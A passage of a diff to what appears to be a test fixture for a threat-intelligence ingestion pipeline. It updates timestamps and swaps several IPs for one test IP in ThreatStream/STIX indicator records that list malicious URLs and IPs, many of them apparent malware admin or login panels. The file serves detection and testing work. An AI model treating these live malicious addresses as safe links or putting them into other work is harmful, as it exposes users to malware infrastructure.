CyberCrime\",\"id\":\"indicator--b4e748c7-0beb-4b0f-a234-938ad9a6b884\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-05T02:00:52.297Z\",\"name\":\"mal_url: http://futuracosmetic.com/frank/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://futuracosmetic.com/frank/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:52.297Z\"}", "category": "threat", "type": "indicator", @@ -16926,7 +16926,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386642007Z", + "ingested": "2021-12-13T08:38:40.024544400Z", "original": "{\"created\":\"2020-02-05T02:00:57.141Z\",\"description\":\"TS ID: 55287965588; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--320c2f41-7546-4aa7-afef-5188df844448\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-05T02:00:57.141Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/tel/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/tel/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:57.141Z\"}", "category": "threat", "type": "indicator", @@ -16978,7 +16978,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386646285Z", + "ingested": "2021-12-13T08:38:40.024550Z", "original": "{\"created\":\"2020-02-05T02:00:57.172Z\",\"description\":\"TS ID: 55287965586; iType: mal_url; State: active; Org: Hetzner Online GmbH; Source: CyberCrime\",\"id\":\"indicator--18a1307c-2dfc-43f9-9e47-93d00c63efcc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-02-05T02:00:57.172Z\",\"name\":\"mal_url: http://video-ld.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://video-ld.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:57.172Z\"}", "category": "threat", "type": "indicator", @@ -17030,7 +17030,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386650613Z", + "ingested": "2021-12-13T08:38:40.024554800Z", "original": "{\"created\":\"2020-02-05T02:00:57.733Z\",\"description\":\"TS ID: 55287965560; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--1e94e26d-5158-4519-b166-2b7e87c2e5de\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-05T02:00:57.733Z\",\"name\":\"mal_url: http://nortonlilly.info/emma/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/emma/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:57.733Z\"}", "category": "threat", "type": "indicator", @@ -17082,7 +17082,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386655001Z", + "ingested": "2021-12-13T08:38:40.024561400Z", "original": "{\"created\":\"2020-02-05T02:01:03.604Z\",\"description\":\"TS ID: 55287965573; iType: mal_url; State: active; Org: Relink LTD; Source: CyberCrime\",\"id\":\"indicator--e396f12a-867b-4e91-8796-d042aef55ce3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-05T02:01:03.604Z\",\"name\":\"mal_url: http://trouserlanditd.com/didi/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trouserlanditd.com/didi/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:03.604Z\"}", "category": "threat", "type": "indicator", @@ -17101,7 +17101,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 170.106.50.37", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55287965589; iType: mal_ip; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime", "modified": "2020-02-05T02:01:16.051Z", "valid_from": "2020-02-05T02:01:16.051Z", @@ -17123,12 +17123,12 @@ "first_seen": "2020-02-05T02:01:16.051Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "170.106.50.37" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386659950Z", - "original": "{\"created\":\"2020-02-05T02:01:16.051Z\",\"description\":\"TS ID: 55287965589; iType: mal_ip; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--5b35dbd2-4915-4c56-9213-7d5272715cb7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-05T02:01:16.051Z\",\"name\":\"mal_ip: 170.106.50.37\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '170.106.50.37']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:16.051Z\"}", + "ingested": "2021-12-13T08:38:40.024568600Z", + "original": "{\"created\":\"2020-02-05T02:01:16.051Z\",\"description\":\"TS ID: 55287965589; iType: mal_ip; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--5b35dbd2-4915-4c56-9213-7d5272715cb7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-05T02:01:16.051Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:16.051Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17179,7 +17179,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386664399Z", + "ingested": "2021-12-13T08:38:40.024576Z", "original": "{\"created\":\"2020-02-05T02:01:18.261Z\",\"description\":\"TS ID: 55287965582; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--8dff68c1-1114-4092-9f29-f655f27d2337\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-60\"],\"modified\":\"2020-02-05T02:01:18.261Z\",\"name\":\"mal_url: http://espoirpharmaceutical.com/includes/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://espoirpharmaceutical.com/includes/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:18.261Z\"}", "category": "threat", "type": "indicator", @@ -17231,7 +17231,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386668867Z", + "ingested": "2021-12-13T08:38:40.024583200Z", "original": "{\"created\":\"2020-02-05T02:01:18.285Z\",\"description\":\"TS ID: 55287965565; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--19636e7d-febc-4ae1-879a-28af129c19b3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-60\"],\"modified\":\"2020-02-05T02:01:18.285Z\",\"name\":\"mal_url: http://credoaz.com/journals/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://credoaz.com/journals/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:18.285Z\"}", "category": "threat", "type": "indicator", @@ -17283,7 +17283,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386673215Z", + "ingested": "2021-12-13T08:38:40.024590500Z", "original": "{\"created\":\"2020-02-05T02:01:21.73Z\",\"description\":\"TS ID: 55287965587; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--593225c7-68c8-44db-82bf-2c550931a60c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-05T02:01:21.73Z\",\"name\":\"mal_url: http://bestlogs.myjino.ru/best/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bestlogs.myjino.ru/best/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:21.73Z\"}", "category": "threat", "type": "indicator", @@ -17302,7 +17302,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://46.229.215.123/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55290730789; iType: mal_url; State: active; Org: TimeWeb Ltd.; Source: CyberCrime", "modified": "2020-02-06T02:10:08.953Z", "valid_from": "2020-02-06T02:10:08.953Z", @@ -17326,16 +17326,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://46.229.215.123/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "46.229.215.123", - "full": "http://46.229.215.123/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386677654Z", - "original": "{\"created\":\"2020-02-06T02:10:08.953Z\",\"description\":\"TS ID: 55290730789; iType: mal_url; State: active; Org: TimeWeb Ltd.; Source: CyberCrime\",\"id\":\"indicator--782e9560-3f13-43eb-9720-e5b43d9a8dd9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-06T02:10:08.953Z\",\"name\":\"mal_url: http://46.229.215.123/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://46.229.215.123/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:08.953Z\"}", + "ingested": "2021-12-13T08:38:40.024597500Z", + "original": "{\"created\":\"2020-02-06T02:10:08.953Z\",\"description\":\"TS ID: 55290730789; iType: mal_url; State: active; Org: TimeWeb Ltd.; Source: CyberCrime\",\"id\":\"indicator--782e9560-3f13-43eb-9720-e5b43d9a8dd9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-06T02:10:08.953Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:08.953Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17385,7 +17385,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386683184Z", + "ingested": "2021-12-13T08:38:40.024636300Z", "original": "{\"created\":\"2020-02-06T02:10:15.947Z\",\"description\":\"TS ID: 55290730799; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--9586420f-3737-47b6-8d58-526f629d66e2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-06T02:10:15.947Z\",\"name\":\"mal_url: http://justwer.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://justwer.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:15.947Z\"}", "category": "threat", "type": "indicator", @@ -17404,7 +17404,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 173.247.252.61", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55290730784; iType: mal_ip; State: active; Org: InMotion Hosting; Source: CyberCrime", "modified": "2020-02-06T02:10:15.988Z", "valid_from": "2020-02-06T02:10:15.988Z", @@ -17426,12 +17426,12 @@ "first_seen": "2020-02-06T02:10:15.988Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "173.247.252.61" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386687803Z", - "original": "{\"created\":\"2020-02-06T02:10:15.988Z\",\"description\":\"TS ID: 55290730784; iType: mal_ip; State: active; Org: InMotion Hosting; Source: CyberCrime\",\"id\":\"indicator--4d0f3370-af7d-4902-abea-65d9f924458b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-06T02:10:15.988Z\",\"name\":\"mal_ip: 173.247.252.61\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '173.247.252.61']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:15.988Z\"}", + "ingested": "2021-12-13T08:38:40.024643700Z", + "original": "{\"created\":\"2020-02-06T02:10:15.988Z\",\"description\":\"TS ID: 55290730784; iType: mal_ip; State: active; Org: InMotion Hosting; Source: CyberCrime\",\"id\":\"indicator--4d0f3370-af7d-4902-abea-65d9f924458b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-06T02:10:15.988Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:15.988Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17482,7 +17482,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386691980Z", + "ingested": "2021-12-13T08:38:40.024649400Z", "original": "{\"created\":\"2020-02-06T02:10:22.051Z\",\"description\":\"TS ID: 55290730781; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--12dac6fb-e53b-4742-9cc4-da362e880571\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-06T02:10:22.051Z\",\"name\":\"mal_url: http://u-knlt.com/Pablo/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://u-knlt.com/Pablo/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:22.051Z\"}", "category": "threat", "type": "indicator", @@ -17501,7 +17501,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 91.215.169.220", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55290730808; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime", "modified": "2020-02-06T02:10:23.024Z", "valid_from": "2020-02-06T02:10:23.024Z", @@ -17523,12 +17523,12 @@ "first_seen": "2020-02-06T02:10:23.024Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "91.215.169.220" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386696459Z", - "original": "{\"created\":\"2020-02-06T02:10:23.024Z\",\"description\":\"TS ID: 55290730808; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--d5c7a00c-4ab5-4501-b79c-4e96838e5602\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-06T02:10:23.024Z\",\"name\":\"mal_ip: 91.215.169.220\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '91.215.169.220']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:23.024Z\"}", + "ingested": "2021-12-13T08:38:40.024657100Z", + "original": "{\"created\":\"2020-02-06T02:10:23.024Z\",\"description\":\"TS ID: 55290730808; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--d5c7a00c-4ab5-4501-b79c-4e96838e5602\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-06T02:10:23.024Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:23.024Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17579,7 +17579,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386701007Z", + "ingested": "2021-12-13T08:38:40.024661100Z", "original": "{\"created\":\"2020-02-06T02:10:35.597Z\",\"description\":\"TS ID: 55290730780; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--524c1a55-264d-4f41-a854-1f0601921675\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-06T02:10:35.597Z\",\"name\":\"mal_url: http://f0378370.xsph.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0378370.xsph.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:35.597Z\"}", "category": "threat", "type": "indicator", @@ -17598,7 +17598,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://85.204.116.145/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55290730787; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime", "modified": "2020-02-06T02:10:59.132Z", "valid_from": "2020-02-06T02:10:59.132Z", @@ -17622,16 +17622,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://85.204.116.145/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "85.204.116.145", - "full": "http://85.204.116.145/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386705225Z", - "original": "{\"created\":\"2020-02-06T02:10:59.132Z\",\"description\":\"TS ID: 55290730787; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime\",\"id\":\"indicator--d8d588e2-5ab4-4937-9051-ae93e79c0204\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-06T02:10:59.132Z\",\"name\":\"mal_url: http://85.204.116.145/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://85.204.116.145/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:59.132Z\"}", + "ingested": "2021-12-13T08:38:40.024665700Z", + "original": "{\"created\":\"2020-02-06T02:10:59.132Z\",\"description\":\"TS ID: 55290730787; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime\",\"id\":\"indicator--d8d588e2-5ab4-4937-9051-ae93e79c0204\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-06T02:10:59.132Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:59.132Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17681,7 +17681,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386709573Z", + "ingested": "2021-12-13T08:38:40.024671Z", "original": "{\"created\":\"2020-02-06T02:11:08.205Z\",\"description\":\"TS ID: 55290730776; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--6b38040c-6578-43c4-8cec-a426d1079a96\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-06T02:11:08.205Z\",\"name\":\"mal_url: http://f0396918.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0396918.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:08.205Z\"}", "category": "threat", "type": "indicator", @@ -17733,7 +17733,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386713761Z", + "ingested": "2021-12-13T08:38:40.024675600Z", "original": "{\"created\":\"2020-02-06T02:11:15.653Z\",\"description\":\"TS ID: 55290730807; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--22ba0c46-ef00-43cc-a2e1-ff75417cf11d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-06T02:11:15.653Z\",\"name\":\"mal_url: http://gpi-q.com/cup/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/cup/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:15.653Z\"}", "category": "threat", "type": "indicator", @@ -17784,7 +17784,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386717909Z", + "ingested": "2021-12-13T08:38:40.024680200Z", "original": "{\"created\":\"2020-02-06T02:11:17.072Z\",\"description\":\"TS ID: 55290730801; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--257bcf28-e6ee-46e8-b9fe-d192fdc7c959\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-06T02:11:17.072Z\",\"name\":\"mal_url: http://l5056942.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l5056942.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:17.072Z\"}", "category": "threat", "type": "indicator", @@ -17836,7 +17836,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386722387Z", + "ingested": "2021-12-13T08:38:40.024683800Z", "original": "{\"created\":\"2020-02-06T02:11:17.098Z\",\"description\":\"TS ID: 55290730797; iType: mal_url; State: active; Org: LLC Eximius; Source: CyberCrime\",\"id\":\"indicator--788aa60d-57c8-4a4c-9666-d6869ccd6c49\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-06T02:11:17.098Z\",\"name\":\"mal_url: http://h146438.s21.test-hf.su/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://h146438.s21.test-hf.su/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:17.098Z\"}", "category": "threat", "type": "indicator", @@ -17888,7 +17888,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386728830Z", + "ingested": "2021-12-13T08:38:40.024689Z", "original": "{\"created\":\"2020-02-06T02:11:27.123Z\",\"description\":\"TS ID: 55290730782; iType: mal_url; State: active; Org: Hotwire Fision; Source: CyberCrime\",\"id\":\"indicator--29909afa-ad21-493c-b420-870dbc8dd0da\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-06T02:11:27.123Z\",\"name\":\"mal_url: http://tranpip.com/vla/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tranpip.com/vla/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:27.123Z\"}", "category": "threat", "type": "indicator", @@ -17939,7 +17939,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386733088Z", + "ingested": "2021-12-13T08:38:40.024696600Z", "original": "{\"created\":\"2020-02-06T02:11:37.189Z\",\"description\":\"TS ID: 55290730803; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--eb5264f6-1f6e-4d1e-a813-d668ef8e6e0e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-06T02:11:37.189Z\",\"name\":\"mal_url: http://l1430a3c.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l1430a3c.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:37.189Z\"}", "category": "threat", "type": "indicator", @@ -17991,7 +17991,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386738077Z", + "ingested": "2021-12-13T08:38:40.024704100Z", "original": "{\"created\":\"2020-02-06T02:12:51.488Z\",\"description\":\"TS ID: 55290730778; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--c5829f98-8034-4bab-b591-9d3fbda9f448\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-06T02:12:51.488Z\",\"name\":\"mal_url: http://f0391270.xsph.ru/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391270.xsph.ru/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:12:51.488Z\"}", "category": "threat", "type": "indicator", @@ -18010,7 +18010,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://85.204.116.144/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55290730800; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime", "modified": "2020-02-06T02:12:52.562Z", "valid_from": "2020-02-06T02:12:52.562Z", @@ -18034,16 +18034,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://85.204.116.144/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "85.204.116.144", - "full": "http://85.204.116.144/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386742906Z", - "original": "{\"created\":\"2020-02-06T02:12:52.562Z\",\"description\":\"TS ID: 55290730800; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime\",\"id\":\"indicator--14575771-256c-4f2f-b4bc-7b96c6805b24\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-06T02:12:52.562Z\",\"name\":\"mal_url: http://85.204.116.144/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://85.204.116.144/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:12:52.562Z\"}", + "ingested": "2021-12-13T08:38:40.024709600Z", + "original": "{\"created\":\"2020-02-06T02:12:52.562Z\",\"description\":\"TS ID: 55290730800; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime\",\"id\":\"indicator--14575771-256c-4f2f-b4bc-7b96c6805b24\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-06T02:12:52.562Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:12:52.562Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18094,7 +18094,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386747545Z", + "ingested": "2021-12-13T08:38:40.024716700Z", "original": "{\"created\":\"2020-02-06T02:13:24.038Z\",\"description\":\"TS ID: 55290730798; iType: mal_url; State: active; Source: 